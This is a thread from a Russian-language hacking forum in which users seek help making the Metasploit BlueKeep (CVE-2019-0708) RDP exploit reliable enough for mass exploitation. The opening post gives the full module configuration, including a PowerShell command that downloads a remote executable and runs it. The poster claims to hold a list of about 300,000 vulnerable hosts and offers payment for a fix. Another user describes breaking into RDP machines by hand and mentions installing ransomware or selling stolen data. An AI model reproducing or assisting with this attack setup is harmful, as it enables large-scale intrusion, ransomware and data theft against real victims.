• XSS.stack #1 – первый литературный журнал от юзеров форума

(CVE-2019-0708) - [BlueKeep] - Exploitation using Metasploit and custom PAYLOAD.

Отслеживать

VoidZero

RAID-массив
Пользователь
Регистрация
01.10.2020
Сообщения
92
Реакции
16
(The configuration used is as follows):

1) use exploit/windows/rdp/cve_2019_0708_bluekeep_rce.
2) set RDP_CLIENT_IP 192.168.1.7
3) set RHOSTS file:/home/michael/Hosts.txt.
4) set TARGET 1.
5) set ForceExploit true.
6) set PAYLOAD windows/x64/exec
7) set CMD "PowerShell (New-Object System.Net.WebClient).DownloadFile('http://www.google.com/svchost.exe','svchost.exe');Start-Process 'svchost.exe'". [I tried also with .PS1 (Powershell script generated from "Unicorn": "https://github.com/trustedsec/unicorn"; with annex D&E of my .EXE)].
8) set GROOMSIZE 50.

I tried in local using a VM (VirtualBox 6.1) Windows 7. [In this case TARGET should be = "2"; and RHOSTS = local IPv6]: everything works well, but I get BSOD; related to DOS invoked.
So, no exploitation success.
The problem to be solved is inside the GROOMBASE ("NonPagedPool - Start"). That's wrong by default.
That's even more complex in mass-exploitation.

Someone has any idea how to solve? Not important locally; (For that it's just needed to get a dump from the memory of the VM: to retrieve the start-address) I'm interested in being able to use that in mass-exploitation. (I already have a large list of "Vulnerable" RDP's).

Any contribute will be appreciated.
Thanks in advance!

Best regards,
VoidZero.
 
p2d сказал(а):
did you fall from the moon?
http://xssforum7mmh3n56inuf2h73hvhnzobi7h2ytb3gvklrfqm7ut3xdnyd.onion/threads/43115/
I already know/done everything exposed by the latter user. It's useless for me.
My object is another; I don't want to create a Meterpreter session; I need to execute my .EXE.
Moreover, as it does not work in my case, it will not work following his tutorial; the nuclear context is the same. The PROBLEM with the "NonPagedPool - Start" address (GROOMBASE) it's valid for both the cases; any Payload nature.

I found a potential useful resource: "
github.com

worawit/CVE-2019-0708

CVE-2019-0708 (BlueKeep). Contribute to worawit/CVE-2019-0708 development by creating an account on GitHub.
github.com
".
MnNonPagedPoolStart address.png

In this way, may be possible to use an "universal" GROOMBASE.
Further concepts:
Windows 7 - NonPagedPool start address.png


Anyway, on the opposide side: I asked to the original author that developed the exploit; and that's his reply.
Commento - zerosum0x0.png


So, it's a confused situation.
 
Последнее редактирование:
It’s passed 1 month and 8 days, since my help request.

Still no one has the skills enough, to solve the latter complexity?

(In the case of concrete help, useful to reach the final success: I am willing to reward economically, adequately!).
______

It’s just missed the, global: GROOMBASE value, detail.
Just that! Nothing more!
*This can be done through spraying large (1GB) nonpaged pool address*.
______

Someone?
I’m waiting.
______

Thanks in advance!
Best regards,
VoidZero.
 
(Please note: I checked each RDP of the world; exposed using port “3389” [Default one]: and my final report: found, around: 300.000 RDP’s still vulnerable to this vulnerability).

[I have already the list. All the rest is ready. I just need to fix the Exploitation script; as already said before.
That’s why I’m so much focused on that Exploit].
______

(*Think about it*).
 
Последнее редактирование:
Bro, i tell you next:
I'm check 100 RDP manually, because exploit can work 1 out of 10 or 100 times, but I wanted to fill my hand:
1. 40+ of them were infected with ransome, with most for over a year.
2. 30 - empty RDP, last conection or change system files - 1year+
3. 20 - usually, but not interested for ransome (if you want)
4. 2-3 - ussualy with info, may be you can upload ransome or sell private info

And now the question is during a mass connection attempt, by running the file with hots, I was able to access 10%. When punching manually to 98%, but I spent about 24 hours on 100 RDP, somewhere less, somewhere more. Now the question is: How are you going to use this for 300,000 RDP?
 
kamzzzzz сказал(а):
Bro, i tell you next:
I'm check 100 RDP manually, because exploit can work 1 out of 10 or 100 times, but I wanted to fill my hand:
1. 40+ of them were infected with ransome, with most for over a year.
2. 30 - empty RDP, last conection or change system files - 1year+
3. 20 - usually, but not interested for ransome (if you want)
4. 2-3 - ussualy with info, may be you can upload ransome or sell private info

And now the question is during a mass connection attempt, by running the file with hots, I was able to access 10%. When punching manually to 98%, but I spent about 24 hours on 100 RDP, somewhere less, somewhere more. Now the question is: How are you going to use this for 300,000 RDP?
It's exactly that the problem.
I should find a fix, as soon as possible.
 
VoidZero сказал(а):
It's exactly that the problem.
I should find a fix, as soon as possible.
How you wanna fix this?
I can start payload in one RDP, I ran it with the same settings 10-15 times exploit and do it. I think, there is no fix for the stable work of this exploit and groom nothing to do
 
kamzzzzz сказал(а):
How you wanna fix this?
I can start payload in one RDP, I ran it with the same settings 10-15 times exploit and do it. I think, there is no fix for the stable work of this exploit and groom nothing to do
As already said and reported: using a large (1GB) "NonPaged Pool Address".
 
admin


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх